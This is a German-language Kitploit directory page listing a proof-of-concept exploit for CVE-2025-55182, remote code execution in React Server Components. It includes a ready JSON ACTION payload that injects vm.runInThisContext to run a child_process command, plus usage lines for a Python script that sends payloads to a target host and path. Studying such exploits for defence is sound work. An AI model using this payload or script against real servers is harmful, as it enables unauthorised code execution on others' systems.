Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182POC — Proof-of-Concept-Exploit für CVE-2025-55182, der Remote-Code-Ausführung in React Server Components über bösartige ACTION-Payloads und vm.runInThisContext-Injektion demonstriert. | Kitploit
Tools/GitHubGitHub/sudo-yangziran/cve-2025-55182poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubsudo-yangziran/cve-2025-55182poc

CVE-2025-55182POC

Proof-of-Concept-Exploit für CVE-2025-55182, der Remote-Code-Ausführung in React Server Components über bösartige ACTION-Payloads und vm.runInThisContext-Injektion demonstriert.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
2vor 8 MonatenNoch nicht geprüft

CVE-2025-55182 React Server Components RCE POC

Dieses Projekt ist ein CVE-2025-55182 - React Server Components (RSC) RCE Proof of Concept und demonstriert, wie unter bestimmten Bedingungen durch vm.runInThisContext und bösartige ACTION-Payloads eine Remotecodeausführung ausgelöst werden kann.

  • Python-Seite: Automatisiertes Senden bösartiger ACTION-Payloads und Parsen der Antwort

⚠ Schwachstellenübersicht (CVE-2025-55182)

ACTION-Payloads von React Server Components können unter bestimmten Bedingungen:

  • zu JS-Objekten deserialisiert werden
  • in vm.runInThisContext ausgeführt werden
  • automatisch in server actions eingefügt werden

Angreifer können folgenden Payload erstellen:

root@kitploit:~
{
  "$ACTION_REF_0": "",
  "$ACTION_0:0": "{\"id\": \"vm#runInThisContext\", \"bound\": [\"global.process.mainModule.require('child_process').execSync('calc').toString()\"]}"
}
ParameterErforderlichStandardwertBeschreibung
--hostJaKeinerIP oder Domain des Zielservers. Z.B.: 127.0.0.1, 192.168.1.10, example.com
--portNein80HTTP-Port des Ziels, z.B.: 3003
--pathJaKeinerWeg (Route) des Ziels, der die Schwachstelle auslöst, z.B.: /feedback, /action
--httpsNeinFalseOb HTTPS zum Senden des Payloads verwendet werden soll (Standard HTTP)

python a.py --host <目标IP> --port <端口> --path <目标URL路径>

python a.py --host 127.0.0.1 --port 3003 --path /feedback

Tool herunterladen